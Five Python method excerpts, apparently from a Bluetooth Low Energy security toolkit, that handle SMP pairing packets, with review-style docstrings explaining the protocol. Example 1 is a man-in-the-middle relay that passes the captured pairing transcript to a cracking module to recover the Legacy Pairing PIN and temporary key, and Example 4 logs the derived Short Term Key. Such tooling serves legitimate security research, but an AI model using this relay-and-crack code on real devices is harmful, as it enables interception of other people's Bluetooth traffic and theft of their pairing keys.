Example #1
    def masterPairingRandom(self, packet):
        """Relay the master's SMP Pairing Random and try to recover the TK.

        Does nothing unless the relay is in the ACTIVE_MITM stage. Otherwise
        the random is recorded, the pairing transcript held on this object
        (request, response, both addresses and their types, master confirm,
        master random) is passed to the ``ble_crack`` module, and the
        unmodified random is forwarded to the slave.

        Security note: every input given to ``ble_crack`` is a value from the
        relayed pairing exchange. That a PIN / temporary key can come back
        from those alone reflects the small key space of the LE Legacy
        Pairing TK (six-digit passkey, or zero for Just Works); devices that
        pair with LE Secure Connections do not derive their key this way.
        """
        if self.getStage() != BLEMitmStage.ACTIVE_MITM:
            return

        masterRandom = packet.random
        randomHex = masterRandom.hex()
        io.info("Pairing Random (from master) : random = " + randomHex)
        io.info("Storing mRand : " + randomHex)
        # Kept byte-reversed relative to the packet field; presumably the
        # order the crypto helpers expect -- confirm against ble.BLECrypto.
        self.mRand = masterRandom[::-1]

        def addressKind(rawType):
            # A single zero byte is reported as "public", anything else as
            # "random".
            return "public" if rawType == b"\x00" else "random"

        cracker = utils.loadModule("ble_crack")
        moduleArguments = (
            ("MASTER_RAND", self.mRand.hex()),
            ("PAIRING_REQUEST", self.pReq.hex()),
            ("PAIRING_RESPONSE", self.pRes.hex()),
            ("INITIATOR_ADDRESS_TYPE", addressKind(self.initiatorAddressType)),
            ("INITIATOR_ADDRESS", self.initiatorAddress),
            ("RESPONDER_ADDRESS_TYPE", addressKind(self.responderAddressType)),
            ("RESPONDER_ADDRESS", self.responderAddress),
            ("MASTER_CONFIRM", self.mConfirm.hex()),
        )
        for argumentName, argumentValue in moduleArguments:
            cracker[argumentName] = argumentValue

        result = cracker.run()
        if not result["success"]:
            # No key recovered: fall back to PIN 0 and a 16-byte all-zero
            # key (presumably the Just Works TK -- confirm).
            self.pin = 0
            self.temporaryKey = bytes(16)
        else:
            recovered = result["output"]
            self.pin = int(recovered["PIN"])
            self.temporaryKey = bytes.fromhex(recovered["TEMPORARY_KEY"])

        io.info("Redirecting to slave ...")
        # The slave receives the random exactly as the master sent it.
        self.a2sEmitter.sendp(ble.BLEPairingRandom(random=masterRandom))
Example #2
	def slavePairingRandom(self,packet):
		"""Relay the slave's SMP Pairing Random to the master.

		Ignored unless the relay is in the ACTIVE_MITM stage. The random is
		logged, stored byte-reversed in ``self.sRand`` and then forwarded to
		the master unchanged.
		"""
		if self.getStage() != BLEMitmStage.ACTIVE_MITM:
			return

		slaveRandom = packet.random
		randomHex = slaveRandom.hex()
		io.info("Pairing Random (from slave) : random = "+randomHex)
		io.info("Storing sRand : "+randomHex)
		# Stored reversed relative to the packet field; presumably the byte
		# order the crypto helpers expect -- confirm against ble.BLECrypto.
		self.sRand = slaveRandom[::-1]
		io.info("Redirecting to master ...")
		# The master receives the value exactly as the slave sent it.
		self.a2mEmitter.sendp(ble.BLEPairingRandom(random=slaveRandom))
Example #3
 def slavePairingRandom(self, packet):
     """Relay the slave's SMP Pairing Random to the master.

     Ignored unless the relay is in the ACTIVE_MITM stage. The random is
     logged, stored byte-reversed in ``self.sRand`` and forwarded to the
     master unchanged.
     """
     if self.getStage() != BLEMitmStage.ACTIVE_MITM:
         return

     slaveRandom = packet.random
     randomHex = slaveRandom.hex()
     io.info("Pairing Random (from slave) : random = " + randomHex)
     io.info("Storing sRand : " + randomHex)
     # Stored reversed relative to the packet field; presumably the byte
     # order the crypto helpers expect -- confirm against ble.BLECrypto.
     self.sRand = slaveRandom[::-1]
     io.info("Redirecting to master ...")
     # A disabled experiment in the original computed a replacement random
     # with ble.BLECrypto.c1m1 from the temporary key, the slave confirm and
     # the pairing transcript, and kept it in self.forgedsRand. It is not
     # executed: the slave's own random is what gets forwarded.
     self.a2mEmitter.sendp(ble.BLEPairingRandom(random=slaveRandom))
Example #4
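    def masterPairingRandom(self, pkt):
        """Handle the master's Pairing Random on the responder side.

        Recomputes the master's confirm value with ``ble.BLECrypto.c1`` from
        the temporary key, the received random and the pairing transcript,
        and compares it with the confirm value stored earlier in
        ``self.mConfirm``.

        On a match the responder's own random (``self.sRand``) is sent and
        the Short Term Key is derived with ``ble.BLECrypto.s1``. On a
        mismatch ``self.failure`` is set and nothing is sent.

        The original sent ``self.sRand`` before checking the confirm value.
        A peer that already holds the responder's confirm value and then
        receives the matching random can test temporary-key guesses offline,
        so the random is now released only after the master has proven it
        knows the key; this is also the order of the SMP legacy pairing flow.
        """
        pkt.show()
        self.mRand = pkt.random

        # The crypto helpers take the randoms byte-reversed relative to the
        # packet field, as the original calls did.
        expectedConfirm = ble.BLECrypto.c1(
            self.tk,
            self.mRand[::-1],
            self.pReq,
            self.pRes,
            self.initiatorAddressType,
            self.initiatorAddress,
            self.responderAddressType,
            self.responderAddress,
        )
        if self.mConfirm != expectedConfirm:
            io.fail("Confirm value failed ! Terminating ...")
            self.failure = True
            # TODO(review): the SMP flow also answers with Pairing Failed
            # (Confirm Value Failed) here; not added because the packet
            # class for it is not visible in this excerpt.
            return

        io.success("Confirm Value correct !")
        self.emitter.sendp(ble.BLEPairingRandom(random=self.sRand))

        self.stk = ble.BLECrypto.s1(self.tk, self.mRand[::-1],
                                    self.sRand[::-1])
        # NOTE(review): this writes key material to the tool's log output.
        io.success("Generating Short Term Key (STK): " + self.stk.hex())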
Example #5
 def slavePairingConfirm(self, pkt):
     """Record the slave's Pairing Confirm and answer with our random.

     The received confirm value is stored byte-reversed in
     ``self.sConfirm``; the reply is a Pairing Random carrying
     ``self.mRand``. Both the incoming packet and the reply are dumped with
     ``show()``.

     NOTE(review): the confirm value is only stored here. Nothing in this
     method checks it, so the handler for the slave's Pairing Random should
     be the place that recomputes and compares it -- confirm.
     """
     pkt.show()
     receivedConfirm = pkt.confirm
     self.sConfirm = receivedConfirm[::-1]

     randomPdu = ble.BLEPairingRandom(random=self.mRand)
     randomPdu.show()
     self.emitter.sendp(randomPdu)